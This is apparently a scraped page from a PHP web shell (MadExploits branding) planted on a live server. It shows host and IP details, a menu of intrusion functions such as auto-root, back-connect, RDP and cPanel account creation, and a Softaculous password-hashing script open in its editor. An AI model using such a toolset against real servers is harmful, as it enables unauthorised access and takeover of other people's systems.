Linux server.nvwebsoft.co.in 3.10.0-1160.114.2.el7.x86_64 #1 SMP Wed Mar 20 15:54:52 UTC 2024 x86_64
Apache
: 162.240.12.249 | : 3.145.106.176
202 Domain
8.1.31
nbspublicschool
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
softaculous /
peel /
[ HOME SHELL ]
Name
Size
Permission
Action
images
[ DIR ]
drwxr-xr-x
php53
[ DIR ]
drwxr-xr-x
php56
[ DIR ]
drwxr-xr-x
php71
[ DIR ]
drwxr-xr-x
php81
[ DIR ]
drwxr-xr-x
php82
[ DIR ]
drwxr-xr-x
clone.php
5.58
KB
-rw-r--r--
edit.php
4.98
KB
-rw-r--r--
edit.xml
447
B
-rw-r--r--
fileindex.php
512
B
-rw-r--r--
import.php
3.09
KB
-rw-r--r--
info.xml
4.57
KB
-rw-r--r--
install.js
924
B
-rw-r--r--
install.php
10.62
KB
-rw-r--r--
install.xml
1.05
KB
-rw-r--r--
md5
4.69
KB
-rw-r--r--
notes.txt
742
B
-rw-r--r--
update_pass.php
1.84
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : update_pass.php
<?php $resp = __get_user_password_hash('[[admin_pass]]'); echo '<update_pass>'.$resp.'</update_pass>'; function __get_user_password_hash($password, $tested_hash = null, $password_given_as_first_password_hash = false, $password_length_if_given_as_first_password_hash = null) { if ($tested_hash == md5($password)) { return $tested_hash; } if (!$password_given_as_first_password_hash) { // Création d'un premier hash du mot de passe $first_password_hash = hash('sha256', 'k)I8#;z=TIxnXmIPdW2TRzt4Ov89|#V~cU@]'.$password); // set where salt will appear in hash $salt_start = strlen($password); } else { $first_password_hash = $password; $salt_start = $password_length_if_given_as_first_password_hash; } // if no salt given create random one if ($tested_hash == null) { $salt_hash = substr(hash('sha256', 'k)I8#;z=TIxnXmIPdW2TRzt4Ov89|#V~cU@]'. uniqid(mt_rand(), true)), 0, 6); } else { $salt_hash = substr($tested_hash, 0, 6); } // add salt into text hash at pass length position and hash it if ($salt_start > 0 && $salt_start < strlen($salt_hash)) { $first_password_hash_start = substr($first_password_hash, 0, $salt_start); $first_password_hash_end = substr($first_password_hash, $salt_start, strlen($salt_hash)); $hash_rough = hash('sha256' , 'k)I8#;z=TIxnXmIPdW2TRzt4Ov89|#V~cU@]'. $first_password_hash_end . $salt_hash . $first_password_hash_start); } elseif ($salt_start > (strlen($salt_hash) - 1)) { $hash_rough = hash('sha256', 'k)I8#;z=TIxnXmIPdW2TRzt4Ov89|#V~cU@]' . $first_password_hash . $salt_hash); } else { $hash_rough = hash('sha256', 'k)I8#;z=TIxnXmIPdW2TRzt4Ov89|#V~cU@]' . $salt_hash . $first_password_hash); } // put salt at front of hash $password_hash = $salt_hash . substr($hash_rough, 0, 26); if (empty($tested_hash) || $tested_hash == $password_hash) { return $password_hash; } } @unlink('update_pass.php'); ?>
Close